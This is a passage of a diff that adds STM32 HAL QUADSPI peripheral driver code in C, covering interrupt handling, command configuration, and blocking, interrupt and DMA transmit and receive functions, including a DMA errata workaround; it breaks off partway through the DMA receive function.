(USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->TxCpltCallback(hqspi); +#else + HAL_QSPI_TxCpltCallback(hqspi); +#endif + } + else if(hqspi->State == HAL_QSPI_STATE_BUSY_INDIRECT_RX) + { + if ((hqspi->Instance->CR & QUADSPI_CR_DMAEN) != 0U) + { + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Disable the DMA channel */ + __HAL_DMA_DISABLE(hqspi->hdma); + } + else + { + data_reg = &hqspi->Instance->DR; + while(READ_BIT(hqspi->Instance->SR, QUADSPI_SR_FLEVEL) != 0U) + { + if (hqspi->RxXferCount > 0U) + { + /* Read the last data received in the FIFO until it is empty */ + *hqspi->pRxBuffPtr = *((__IO uint8_t *)data_reg); + hqspi->pRxBuffPtr++; + hqspi->RxXferCount--; + } + else + { + /* All data have been received for the transfer */ + break; + } + } + } + + /* Workaround - Extra data written in the FIFO at the end of a read transfer */ + HAL_QSPI_Abort_IT(hqspi); + + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* RX Complete callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->RxCpltCallback(hqspi); +#else + HAL_QSPI_RxCpltCallback(hqspi); +#endif + } + else if(hqspi->State == HAL_QSPI_STATE_BUSY) + { + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Command Complete callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->CmdCpltCallback(hqspi); +#else + HAL_QSPI_CmdCpltCallback(hqspi); +#endif + } + else if(hqspi->State == HAL_QSPI_STATE_ABORT) + { + /* Reset functional mode configuration to indirect write mode by default */ + CLEAR_BIT(hqspi->Instance->CCR, QUADSPI_CCR_FMODE); + + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + if (hqspi->ErrorCode == HAL_QSPI_ERROR_NONE) + { + /* Abort called by the user */ + + /* Abort Complete callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->AbortCpltCallback(hqspi); +#else + HAL_QSPI_AbortCpltCallback(hqspi); +#endif + } + else + { + /* Abort due to an error (eg : DMA error) */ + + /* Error callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->ErrorCallback(hqspi); +#else + HAL_QSPI_ErrorCallback(hqspi); +#endif + } + } + else + { + /* Nothing to do */ + } + } + + /* QSPI Status Match interrupt occurred ------------------------------------*/ + else if(((flag & QSPI_FLAG_SM) != 0U) && ((itsource & QSPI_IT_SM) != 0U)) + { + /* Clear interrupt */ + WRITE_REG(hqspi->Instance->FCR, QSPI_FLAG_SM); + + /* Check if the automatic poll mode stop is activated */ + if(READ_BIT(hqspi->Instance->CR, QUADSPI_CR_APMS) != 0U) + { + /* Disable the QSPI Transfer Error and Status Match Interrupts */ + __HAL_QSPI_DISABLE_IT(hqspi, (QSPI_IT_SM | QSPI_IT_TE)); + + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + } + + /* Status match callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->StatusMatchCallback(hqspi); +#else + HAL_QSPI_StatusMatchCallback(hqspi); +#endif + } + + /* QSPI Transfer Error interrupt occurred ----------------------------------*/ + else if(((flag & QSPI_FLAG_TE) != 0U) && ((itsource & QSPI_IT_TE) != 0U)) + { + /* Clear interrupt */ + WRITE_REG(hqspi->Instance->FCR, QSPI_FLAG_TE); + + /* Disable all the QSPI Interrupts */ + __HAL_QSPI_DISABLE_IT(hqspi, QSPI_IT_SM | QSPI_IT_TC | QSPI_IT_TE | QSPI_IT_FT); + + /* Set error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_TRANSFER; + + if ((hqspi->Instance->CR & QUADSPI_CR_DMAEN) != 0U) + { + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Disable the DMA channel */ + hqspi->hdma->XferAbortCallback = QSPI_DMAAbortCplt; + if (HAL_DMA_Abort_IT(hqspi->hdma) != HAL_OK) + { + /* Set error code to DMA */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Error callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->ErrorCallback(hqspi); +#else + HAL_QSPI_ErrorCallback(hqspi); +#endif + } + } + else + { + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Error callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->ErrorCallback(hqspi); +#else + HAL_QSPI_ErrorCallback(hqspi); +#endif + } + } + + /* QSPI Timeout interrupt occurred -----------------------------------------*/ + else if(((flag & QSPI_FLAG_TO) != 0U) && ((itsource & QSPI_IT_TO) != 0U)) + { + /* Clear interrupt */ + WRITE_REG(hqspi->Instance->FCR, QSPI_FLAG_TO); + + /* Timeout callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->TimeOutCallback(hqspi); +#else + HAL_QSPI_TimeOutCallback(hqspi); +#endif + } + + else + { + /* Nothing to do */ + } +} + +/** + * @brief Set the command configuration. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information + * @param Timeout : Timeout duration + * @note This function is used only in Indirect Read or Write Modes + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Command(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd, uint32_t Timeout) +{ + HAL_StatusTypeDef status; + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_QSPI_INSTRUCTION_MODE(cmd->InstructionMode)); + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + assert_param(IS_QSPI_INSTRUCTION(cmd->Instruction)); + } + + assert_param(IS_QSPI_ADDRESS_MODE(cmd->AddressMode)); + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + assert_param(IS_QSPI_ADDRESS_SIZE(cmd->AddressSize)); + } + + assert_param(IS_QSPI_ALTERNATE_BYTES_MODE(cmd->AlternateByteMode)); + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + assert_param(IS_QSPI_ALTERNATE_BYTES_SIZE(cmd->AlternateBytesSize)); + } + + assert_param(IS_QSPI_DUMMY_CYCLES(cmd->DummyCycles)); + assert_param(IS_QSPI_DATA_MODE(cmd->DataMode)); + + assert_param(IS_QSPI_DDR_MODE(cmd->DdrMode)); + assert_param(IS_QSPI_DDR_HHC(cmd->DdrHoldHalfCycle)); + assert_param(IS_QSPI_SIOO_MODE(cmd->SIOOMode)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_BUSY; + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_BUSY, RESET, tickstart, Timeout); + + if (status == HAL_OK) + { + /* Call the configuration function */ + QSPI_Config(hqspi, cmd, QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE); + + if (cmd->DataMode == QSPI_DATA_NONE) + { + /* When there is no data phase, the transfer start as soon as the configuration is done + so wait until TC flag is set to go back in idle state */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_TC, SET, tickstart, Timeout); + + if (status == HAL_OK) + { + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + } + else + { + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + } + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** + * @brief Set the command configuration in interrupt mode. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information + * @note This function is used only in Indirect Read or Write Modes + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Command_IT(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd) +{ + HAL_StatusTypeDef status; + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_QSPI_INSTRUCTION_MODE(cmd->InstructionMode)); + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + assert_param(IS_QSPI_INSTRUCTION(cmd->Instruction)); + } + + assert_param(IS_QSPI_ADDRESS_MODE(cmd->AddressMode)); + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + assert_param(IS_QSPI_ADDRESS_SIZE(cmd->AddressSize)); + } + + assert_param(IS_QSPI_ALTERNATE_BYTES_MODE(cmd->AlternateByteMode)); + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + assert_param(IS_QSPI_ALTERNATE_BYTES_SIZE(cmd->AlternateBytesSize)); + } + + assert_param(IS_QSPI_DUMMY_CYCLES(cmd->DummyCycles)); + assert_param(IS_QSPI_DATA_MODE(cmd->DataMode)); + + assert_param(IS_QSPI_DDR_MODE(cmd->DdrMode)); + assert_param(IS_QSPI_DDR_HHC(cmd->DdrHoldHalfCycle)); + assert_param(IS_QSPI_SIOO_MODE(cmd->SIOOMode)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_BUSY; + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout_CPUCycle(hqspi, QSPI_FLAG_BUSY, RESET, hqspi->Timeout); + + if (status == HAL_OK) + { + if (cmd->DataMode == QSPI_DATA_NONE) + { + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TE | QSPI_FLAG_TC); + } + + /* Call the configuration function */ + QSPI_Config(hqspi, cmd, QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE); + + if (cmd->DataMode == QSPI_DATA_NONE) + { + /* When there is no data phase, the transfer start as soon as the configuration is done + so activate TC and TE interrupts */ + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI Transfer Error Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE | QSPI_IT_TC); + } + else + { + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + /* Return function status */ + return status; +} + +/** + * @brief Transmit an amount of data in blocking mode. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer + * @param Timeout : Timeout duration + * @note This function is used only in Indirect Write Mode + + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Transmit(QSPI_HandleTypeDef *hqspi, uint8_t *pData, uint32_t Timeout) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tickstart = HAL_GetTick(); + __IO uint32_t *data_reg = &hqspi->Instance->DR; + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_TX; + + /* Configure counters and size of the handle */ + hqspi->TxXferCount = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->TxXferSize = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->pTxBuffPtr = pData; + + /* Configure QSPI: CCR register with functional as indirect write */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE); + + while(hqspi->TxXferCount > 0U) + { + /* Wait until FT flag is set to send data */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_FT, SET, tickstart, Timeout); + + if (status != HAL_OK) + { + break; + } + + *((__IO uint8_t *)data_reg) = *hqspi->pTxBuffPtr; + hqspi->pTxBuffPtr++; + hqspi->TxXferCount--; + } + + if (status == HAL_OK) + { + /* Wait until TC flag is set to go back in idle state */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_TC, SET, tickstart, Timeout); + + if (status == HAL_OK) + { + /* Clear Transfer Complete bit */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Clear Busy bit */ + status = HAL_QSPI_Abort(hqspi); + } + } + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + } + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + return status; +} + + +/** + * @brief Receive an amount of data in blocking mode. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer + * @param Timeout : Timeout duration + * @note This function is used only in Indirect Read Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Receive(QSPI_HandleTypeDef *hqspi, uint8_t *pData, uint32_t Timeout) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tickstart = HAL_GetTick(); + uint32_t addr_reg = READ_REG(hqspi->Instance->AR); + __IO uint32_t *data_reg = &hqspi->Instance->DR; + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_RX; + + /* Configure counters and size of the handle */ + hqspi->RxXferCount = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->RxXferSize = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->pRxBuffPtr = pData; + + /* Configure QSPI: CCR register with functional as indirect read */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_READ); + + /* Start the transfer by re-writing the address in AR register */ + WRITE_REG(hqspi->Instance->AR, addr_reg); + + while(hqspi->RxXferCount > 0U) + { + /* Wait until FT or TC flag is set to read received data */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, (QSPI_FLAG_FT | QSPI_FLAG_TC), SET, tickstart, Timeout); + + if (status != HAL_OK) + { + break; + } + + *hqspi->pRxBuffPtr = *((__IO uint8_t *)data_reg); + hqspi->pRxBuffPtr++; + hqspi->RxXferCount--; + } + + if (status == HAL_OK) + { + /* Wait until TC flag is set to go back in idle state */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_TC, SET, tickstart, Timeout); + + if (status == HAL_OK) + { + /* Clear Transfer Complete bit */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Workaround - Extra data written in the FIFO at the end of a read transfer */ + status = HAL_QSPI_Abort(hqspi); + } + } + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + } + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + return status; +} + +/** + * @brief Send an amount of data in non-blocking mode with interrupt. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer + * @note This function is used only in Indirect Write Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Transmit_IT(QSPI_HandleTypeDef *hqspi, uint8_t *pData) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_TX; + + /* Configure counters and size of the handle */ + hqspi->TxXferCount = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->TxXferSize = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->pTxBuffPtr = pData; + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TE | QSPI_FLAG_TC); + + /* Configure QSPI: CCR register with functional as indirect write */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE); + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI transfer error, FIFO threshold and transfer complete Interrupts */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE | QSPI_IT_FT | QSPI_IT_TC); + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + return status; +} + +/** + * @brief Receive an amount of data in non-blocking mode with interrupt. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer + * @note This function is used only in Indirect Read Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Receive_IT(QSPI_HandleTypeDef *hqspi, uint8_t *pData) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t addr_reg = READ_REG(hqspi->Instance->AR); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_RX; + + /* Configure counters and size of the handle */ + hqspi->RxXferCount = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->RxXferSize = READ_REG(hqspi->Instance->DLR) + 1U; + hqspi->pRxBuffPtr = pData; + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TE | QSPI_FLAG_TC); + + /* Configure QSPI: CCR register with functional as indirect read */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_READ); + + /* Start the transfer by re-writing the address in AR register */ + WRITE_REG(hqspi->Instance->AR, addr_reg); + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI transfer error, FIFO threshold and transfer complete Interrupts */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE | QSPI_IT_FT | QSPI_IT_TC); + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + return status; +} + +/** + * @brief Send an amount of data in non-blocking mode with DMA. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer + * @note This function is used only in Indirect Write Mode + * @note If DMA peripheral access is configured as halfword, the number + * of data and the fifo threshold should be aligned on halfword + * @note If DMA peripheral access is configured as word, the number + * of data and the fifo threshold should be aligned on word + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Transmit_DMA(QSPI_HandleTypeDef *hqspi, uint8_t *pData) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t data_size = (READ_REG(hqspi->Instance->DLR) + 1U); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + /* Clear the error code */ + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Configure counters of the handle */ + if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_BYTE) + { + hqspi->TxXferCount = data_size; + } + else if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_HALFWORD) + { + if (((data_size % 2U) != 0U) || ((hqspi->Init.FifoThreshold % 2U) != 0U)) + { + /* The number of data or the fifo threshold is not aligned on halfword + => no transfer possible with DMA peripheral access configured as halfword */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + else + { + hqspi->TxXferCount = (data_size >> 1U); + } + } + else if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_WORD) + { + if (((data_size % 4U) != 0U) || ((hqspi->Init.FifoThreshold % 4U) != 0U)) + { + /* The number of data or the fifo threshold is not aligned on word + => no transfer possible with DMA peripheral access configured as word */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + else + { + hqspi->TxXferCount = (data_size >> 2U); + } + } + else + { + /* Nothing to do */ + } + + if (status == HAL_OK) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_TX; + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, (QSPI_FLAG_TE | QSPI_FLAG_TC)); + + /* Configure size and pointer of the handle */ + hqspi->TxXferSize = hqspi->TxXferCount; + hqspi->pTxBuffPtr = pData; + + /* Configure QSPI: CCR register with functional mode as indirect write */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE); + + /* Set the QSPI DMA transfer complete callback */ + hqspi->hdma->XferCpltCallback = QSPI_DMATxCplt; + + /* Set the QSPI DMA Half transfer complete callback */ + hqspi->hdma->XferHalfCpltCallback = QSPI_DMATxHalfCplt; + + /* Set the DMA error callback */ + hqspi->hdma->XferErrorCallback = QSPI_DMAError; + + /* Clear the DMA abort callback */ + hqspi->hdma->XferAbortCallback = NULL; + +#if defined (QSPI1_V2_1L) + /* Bug "ES0305 section 2.1.8 In some specific cases, DMA2 data corruption occurs when managing + AHB and APB2 peripherals in a concurrent way" Workaround Implementation: + Change the following configuration of DMA peripheral + - Enable peripheral increment + - Disable memory increment + - Set DMA direction as peripheral to memory mode */ + + /* Enable peripheral increment mode of the DMA */ + hqspi->hdma->Init.PeriphInc = DMA_PINC_ENABLE; + + /* Disable memory increment mode of the DMA */ + hqspi->hdma->Init.MemInc = DMA_MINC_DISABLE; + + /* Update peripheral/memory increment mode bits */ + MODIFY_REG(hqspi->hdma->Instance->CR, (DMA_SxCR_MINC | DMA_SxCR_PINC), (hqspi->hdma->Init.MemInc | hqspi->hdma->Init.PeriphInc)); + + /* Configure the direction of the DMA */ + hqspi->hdma->Init.Direction = DMA_PERIPH_TO_MEMORY; +#else + /* Configure the direction of the DMA */ + hqspi->hdma->Init.Direction = DMA_MEMORY_TO_PERIPH; +#endif /* QSPI1_V2_1L */ + + /* Update direction mode bit */ + MODIFY_REG(hqspi->hdma->Instance->CR, DMA_SxCR_DIR, hqspi->hdma->Init.Direction); + + /* Enable the QSPI transmit DMA Channel */ + if (HAL_DMA_Start_IT(hqspi->hdma, (uint32_t)pData, (uint32_t)&hqspi->Instance->DR, hqspi->TxXferSize) == HAL_OK) + { + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI transfer error Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE); + + /* Enable the DMA transfer by setting the DMAEN bit in the QSPI CR register */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + } + else + { + status = HAL_ERROR; + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + hqspi->State = HAL_QSPI_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + return status; +} + +/** + * @brief Receive an amount of data in non-blocking mode with DMA. + * @param hqspi : QSPI handle + * @param pData : pointer to data buffer. + * @note This function is used only in Indirect Read Mode + * @note If DMA peripheral access is configured as halfword, the number + * of data and the fifo threshold should be aligned on halfword + * @note If DMA peripheral access is configured as word, the number + * of data and the fifo threshold should be aligned on word + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_Receive_DMA(QSPI_HandleTypeDef *hqspi, uint8_t *pData) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t addr_reg = READ_REG(hqspi->Instance->AR); + uint32_t data_size = (READ_REG(hqspi->Instance->DLR) + 1U); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + /* Clear the error code */ + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + if(pData != NULL ) + { + /* Configure counters of the handle */ + if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_BYTE) + { + hqspi->RxXferCount = data_size; + } + else if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_HALFWORD) + { + if (((data_size % 2U) != 0U) || ((hqspi->Init.FifoThreshold % 2U) != 0U)) + { + /* The number of data or the fifo threshold is not aligned on halfword + => no transfer possible with DMA peripheral access configured as halfword */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + else + { + hqspi->RxXferCount = (data_size >> 1U); + } + } + else if (hqspi->hdma->Init.PeriphDataAlignment == DMA_PDATAALIGN_WORD) + { + if (((data_size % 4U) != 0U) || ((hqspi->Init.FifoThreshold % 4U) != 0U)) + { + /* The number of data or the fifo threshold is not aligned on word + => no transfer possible with DMA peripheral access configured as word */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + else + { + hqspi->RxXferCount = (data_size >> 2U); + } + } + else + { + /* Nothing to do */ + } + + if (status == HAL_OK) + { + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_INDIRECT_RX; + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, (QSPI_FLAG_TE | QSPI_FLAG_TC)); + + /* Configure size and pointer of the handle */ + hqspi->RxXferSize = hqspi->RxXferCount; + hqspi->pRxBuffPtr = pData; + + /* Set the QSPI DMA transfer complete callback */ + hqspi->hdma->XferCpltCallback = QSPI_DMARxCplt; + + /* Set the QSPI DMA Half transfer complete callback */ + hqspi->hdma->XferHalfCpltCallback = QSPI_DMARxHalfCplt; + + /* Set the DMA error callback */ + hqspi->hdma->XferErrorCallback = QSPI_DMAError; + + /* Clear the DMA abort callback */ + hqspi->hdma->XferAbortCallback = NULL; + +#if defined (QSPI1_V2_1L) + /* Bug "ES0305 section 2.1.8 In some specific cases, DMA2 data corruption occurs when managing + AHB and APB2 peripherals in a concurrent way" Workaround Implementation: + Change the following configuration of DMA peripheral + - Enable peripheral increment + - Disable memory increment + - Set DMA direction as memory to peripheral mode + - 4 Extra words (32-bits) are added for read operation to guarantee + the last data is transferred from DMA FIFO to RAM memory */ + + /* Enable peripheral increment of the DMA */ + hqspi->hdma->Init.PeriphInc = DMA_PINC_ENABLE; + + /* Disable memory increment of the DMA */ + hqspi->hdma->Init.MemInc = DMA_MINC_DISABLE; + + /* Update peripheral/memory increment mode bits */ + MODIFY_REG(hqspi->hdma->Instance->CR, (DMA_SxCR_MINC | DMA_SxCR_PINC), (hqspi->hdma->Init.MemInc | hqspi->hdma->Init.PeriphInc)); + + /* Configure the direction of the DMA */ + hqspi->hdma->Init.Direction = DMA_MEMORY_TO_PERIPH; + + /* 4 Extra words (32-bits) are needed for read operation to guarantee + the last data is transferred from DMA FIFO to RAM memory */ + WRITE_REG(hqspi->Instance->DLR, (data_size - 1U + 16U)); + + /* Update direction mode bit */ + MODIFY_REG(hqspi->hdma->Instance->CR, DMA_SxCR_DIR, hqspi->hdma->Init.Direction); + + /* Configure QSPI: CCR register with functional as indirect read */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_READ); + + /* Start the transfer by re-writing the address in AR register */ + WRITE_REG(hqspi->Instance->AR, addr_reg); + + /* Enable the DMA Channel */ + if(HAL_DMA_Start_IT(hqspi->hdma, (uint32_t)&hqspi->Instance->DR, (uint32_t)pData, hqspi->RxXferSize) == HAL_OK) + { + /* Enable the DMA transfer by setting the DMAEN bit in the QSPI CR register */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI transfer error Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE); + } + else + { + status = HAL_ERROR; + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + hqspi->State = HAL_QSPI_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } +#else + /* Configure the direction of the DMA */ + hqspi->hdma->Init.Direction = DMA_PERIPH_TO_MEMORY; + + /* Update direction mode bit */ + MODIFY_REG(hqspi->hdma->Instance->CR, DMA_SxCR_DIR, hqspi->hdma->Init.Direction); + + /* Enable the DMA Channel */ + 